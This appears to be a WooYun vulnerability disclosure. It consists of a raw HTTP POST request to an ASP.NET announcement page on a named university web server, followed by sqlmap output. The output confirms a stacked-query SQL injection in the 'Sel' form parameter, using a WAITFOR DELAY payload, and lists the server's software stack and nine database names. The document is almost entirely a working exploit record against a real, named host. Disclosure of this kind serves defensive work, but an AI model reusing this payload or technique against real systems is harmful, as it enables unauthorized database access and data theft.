WooYun.org

POST /Corp/Announcement.aspx HTTP/1.1
Content-Length: 334
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jjlyj.csuft.edu.cn
Cookie: ASP.NET_SessionId=bb5jbe55kuaai255blh0vh55
Host: jjlyj.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24cphContect%24btSel=%cb%d1%a1%a1%cb%f7&ctl00%24cphContect%24Sel=h&__EVENTVALIDATION=/wEWAwK4jpUVApD80qgBAqmk95MDqIc14oioEaGVFqy7qWF0oEvyVV4%3d&__VIEWSTATE=/wEPDwUKLTYzNTc2NDQ0NQ9kFgJmD2QWAgIBD2QWAgIDD2QWBAIHDw8WAh4HVmlzaWJsZWdkZAIJDxYCHwBoZGS%2b%2b89zcFwdPN06gaZ%2bx0GsUew0cQ%3d%3d

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$cphContect$Sel (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ctl00$cphContect$btSel=%cb%d1%a1%a1%cb%f7&ctl00$cphContect$Sel=h');WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWAwLirNqCAgKQ/NKoAQKppPeTA+Q/IaOoHU1IDAWszTf07rH2Zjee&__VIEWSTATE=/wEPDwUKLTYzNTc2NDQ0NQ9kFgJmD2QWAgIBD2QWAgIDD2QWBAIHDw8WBB4EVGV4dAUV5pqC5peg55u45YWz5L+h5oGv77yOHgdWaXNpYmxlZ2RkAgkPFgIfAWhkZNpQm/3yzLf6V8fwpvfbZ1FVJX8c
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] jjlyj
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] znlykjdx
[*] znlykjdxskb